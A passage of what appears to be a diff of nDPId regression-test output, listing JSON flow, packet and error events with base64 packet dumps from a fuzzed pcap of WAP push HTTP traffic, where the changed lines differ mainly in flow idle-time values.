ubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2177,"global_ts_msec":1031854495447} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2177,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"AFCLk5N8CAAgsl17CIFFAAAsxLVAAEAGF9ysFAMNTBQDBQBQCirJ0lLg5GTHa2ASgywbsgAAAgQFtA=="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26,"global_ts_msec":1031854495447} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
-00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqq"} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} 
-01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"} 
+00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqq"} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} 
+01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854514844} 
02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAXcFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":445,"global_ts_msec":1031854514844} 